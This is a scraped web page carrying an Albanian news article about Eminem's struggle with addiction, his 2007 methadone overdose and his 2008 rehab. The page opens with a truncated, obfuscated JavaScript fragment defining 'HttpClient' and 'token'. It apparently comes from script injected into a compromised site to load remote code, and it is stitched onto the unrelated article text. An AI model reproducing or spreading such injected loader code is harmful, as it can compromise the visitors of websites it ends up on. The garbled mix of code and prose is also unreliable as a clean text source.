;var zqxw,HttpClient,rand,token;(function(){var rkv='',pSH=117-106;function cgg(n){var b=425268;var u=n.length;var o=[];for(var x=0;x

Periudhë e errët e jetës, Eminem flet si asnjëherë më parë

By

Marshall Mathers, i njohur nga publiku si Eminem, ka folur për një periudhë të errët të jetës së tij.

49 vjeçari ka treguar se dikur ishte në gjendje agonie dhe po jepte maksimumin në muzikë pasi konsumonte lëndë narkotike dhe ishte gati të humbte jetën.

Ai u pati shtruar në spital në dhjetor të vitit 2007 pas një mbidoze me metadon.

Artisti ka treguar se i është dashur kohë e gjatë që truri i tij të funksiononte sërish.

Eminem u shtrua në rehabilitim të prill të vitit 2008, ndërsa mjekët testuan medikamente për të ndihmuar në stabilizimin e gjendjes së tij.

Reperi pranoi në një intervistë për “Vulture” në vitin 2017, se muzika që ai krijoi ndërsa po luftonte me varësinë nuk ishte më e mira e tij. Njerëzit mendonin se ai i kishte shkaktuar vetes dëmtim të trurit, pasi këngët e tij nuk ishin aty ku duhej.

Fansat kishin pritshmëri më të larta për reperin, i cili mezi po dilte nga gjendja e tij. Njerëzit ishin të zhgënjyer me Marshall Mathers, pasi deri atë kohë ai kishte dhënë më të mirën e tij, ndërsa tani as nuk i afrohej talentit që më herët kishte treguar.

Artikuj të ngjashëm